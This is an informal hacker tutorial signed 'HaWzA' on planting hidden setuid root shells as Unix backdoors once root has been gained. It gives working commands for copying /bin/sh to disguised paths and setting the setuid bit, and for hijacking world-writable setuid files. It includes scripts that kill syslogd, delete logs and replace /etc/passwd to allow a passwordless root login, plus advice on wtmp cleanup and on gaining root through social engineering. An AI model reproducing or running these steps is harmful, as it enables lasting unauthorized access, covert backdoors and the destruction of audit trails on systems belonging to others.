What is a Shell?

A shell is basically a command interpreter like command.com in DOS. It takes your commands such as ls and then runs the application surrounding it. There are several flavours of shell such as the standard Bourne shell (sh) or the C shell (csh).

What is a Suid Shell?

A suid shell is a shell that is set to run with the privileges of the owner. So for example if root is the owner then you can execute commands as root ;) Normal shells are set rwxr-xr-x which means that root can read, write and execute the shell but everyone else can only read and execute it with their privilege level i.e. none.

However if you see a shell set like this rwsr-xr-x (notice the s) then that program is set to run with the privileges of the owner, if this is root then anyone who runs it can do anything on the system they want.. such as add users, change root pwd, remove logging etc... all kinds of fun stuff!

Why do i need one?

Easy question to answer. Once you've hacked root by whatever method the sysadmin will fairly quickly spot that something has gone awry. Most of the time they will read the logs and change roots passwd. Wave bye bye to your access.

However if you create a suid shell you never have to log in as root, the sys logs rarely show that anyone is doing anything as root and if the sysadmin does notice, he will think that he has been hacked again and change roots passwd. So what? You dont need it with one of these! Plus you can make as many copies of these so if one is found you have a few spares ;)

Ok how do I get one then??

Hmm the tricky bit this.. It really depends on the sysadmin that you have. I have several on different machines and most of them were created by hanging around a sysadmins machine until he went to have a piss or make a coffee and then quickly creating it using a window left logged in as root. Or you can soc eng the passwd.. or use one of the myriad of security holes in Unix.. whatever you want really.

Once you get root find a directory in the machine that is hardly ever used cause you really dont want to be found with one in your home dir do you? A good place to keep them is deep in the /usr dir such as /usr/X11/include/X11/extensions. No one pokes around in there! Also the dir should be fairly full cause most sysadmins wont check through all files in a dir for suid shells. Also you should name then sumthing similar to the files in the dir. For example in the above dir the files are called sync.h shape.h etc.. so call the shell, say, part.h

Another good place is to hide it in a dir with other suid proggies like /usr/sbin/ and call it something reasonable.

Then you want to create the suid shell in this dir. This is done by typing this

cp /bin/sh /usr/X11/include/X11/extensions/part.h
chmod  4755 /usr/X11/include/X11/extensions/part.h

The 4 is the suid bit.

But I have also got them by finding a program with its permissions set thus rwsrwxr-x or in fact ANY file that is suid to root with write access for group or world. Now this file can be anything initially, a text file, a binary a picture anything.. you create the shell like this, assuming the file that is suid is called fart.

cp fart fart1
cat /bin/sh > fart

Then you have to copy fart to a good dir and then copy fart1 back to fart. This is done by using a shell proggie using the new suid shell such as this.

#!/fart

cp fart /usr/X11/include/X11/extensions/part.h
mv fart1 fart
chmod 4755 /usr/X11/include/X11/extensions/part.h
exit

Obviously this all takes time and in this case as with most hacks you have to plan and be prepared for the occasion. I always investigate a system and plan it before I even try. Also I always create at least two or three of them so if one is found i have a few more. And each time I login i check to see if they are all still there.

Thats it! You now have a program that will allow you to execute commands as root!

I have one now but how do I use it?

Generally you will find that most systems will not let you run anything but registered shells as your shell. You can check this by poking around in /etc. On my Linux machine there is a file called shells that lists all of the files that are allowed to be run as shells. But you can run scripts using anything as a shell! Say you wanna move /etc/passwd to /etc/passwd.heh. To do this you write a script like this;

#!/usr/X11/include/X11/extensions/part.h

mv /etc/passwd /etc/passwd.heh
exit

Obviously you dont want to do this unless you wanna shag the system for a while ;)

So basically you are limited to non-interactive applications. However provided the script is well written you can actually do virtually anything with the configuration of the system from script.

But if you really need interactive access then you can follow this procedure, its best to prepare the scripts first.

First copy /etc/passwd to your home dir and edit it to remove the encrypted form of roots passwd. Then type 'ps ax |grep syslog' to get the process number. Now run the following script, invoked as 'interactive XX' (where XX is the proc number for syslogd).

#!/usr/X11/include/X11/extensions/part.h

kill -9 $1
rm -f /var/adm/syslog
cp /etc/passwd /etc/passwd.OLD
cp ~hawza/passwd /etc/passwd
chmod 644 /etc/passwd
exit

Now login as root with no passwd 8)

Once your finished you should run the following script to replace the original passwd file.

#!/usr/X11/include/X11/extensions/part.h

cp /etc/passwd.OLD /etc/passwd
chmod 644 /etc/passwd
exit

Then you should use a wtmp editor to clean up after you.

Thats basically it, im sure I have made a mistake prolly so read it carefully and think out exactly what you are doing before you do it ;)

Submissions, corrections, comments, input, complaints, bomb threats, cash etc., should be directed to HaWzA